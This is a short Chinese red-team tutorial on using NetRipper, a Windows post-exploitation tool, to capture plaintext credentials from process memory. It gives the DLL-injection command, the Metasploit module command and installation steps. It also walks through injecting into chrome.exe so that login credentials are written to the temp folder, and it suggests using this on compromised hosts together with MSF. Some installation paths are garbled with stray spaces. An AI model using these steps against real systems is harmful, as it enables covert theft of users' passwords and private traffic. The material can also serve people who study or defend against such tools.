红队攻防之获取内存中的密码
红队攻防之获取内存中的密码
0X01 NetRipper
NetRipper是针对Windows系统的后期开发工具,其使用API挂钩来拦截低特权用户的网络流量和与加密相关的功能,从而能够在加密之前/解密之后捕获纯文本流量和加密流量。
0X02 用法
1 | Injection: NetRipper.exe DLLpath.dll processname.exe |
Metasploit模块
1 | msf exploit(multi/handler) > use post/windows/gather/netripper/netripper |
设置PROCESSNAMES或PROCESSIDS并运行。
Metasploit安装(Kali)
- mkdir / usr / share / metasploit-framework / modules / post / windows / gather / netripper
- cp Metasploit / netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper.rb
- cp x86 / DLL.x86.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.x86.dll
- cp x64 / DLL.x64.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.x64.dll
Metasploit安装(后备箱)
- mkdir / opt / metasploit-framework / modules / post / windows / gather / netripper
- cp Metasploit / netripper.rb /opt/metasploit-framework/modules/post/windows/gather/netripper/netripper.rb
- cp x86 / DLL.x86.dll /opt/metasploit-framework/modules/post/windows/gather/netripper/DLL.x86.dll
- cp x64 / DLL.x64.dll /opt/metasploit-framework/modules/post/windows/gather/netripper/DLL.x64.dll
0x03 操作演示
执行命令,将DLL文件注入到chrome浏览器里
1 | NetRipper.x64.exe "C:\Users\ailishi\Downloads\NetRipper-master\x64\DLL.x64.dll" chrome.exe |
登录一个网站就行
登录一个网站就行,查看temp
通过POWERSHELL也行
0x04 思路
可以在入侵主机上注入进程进而获取重要信息,可以结合MSF进行操作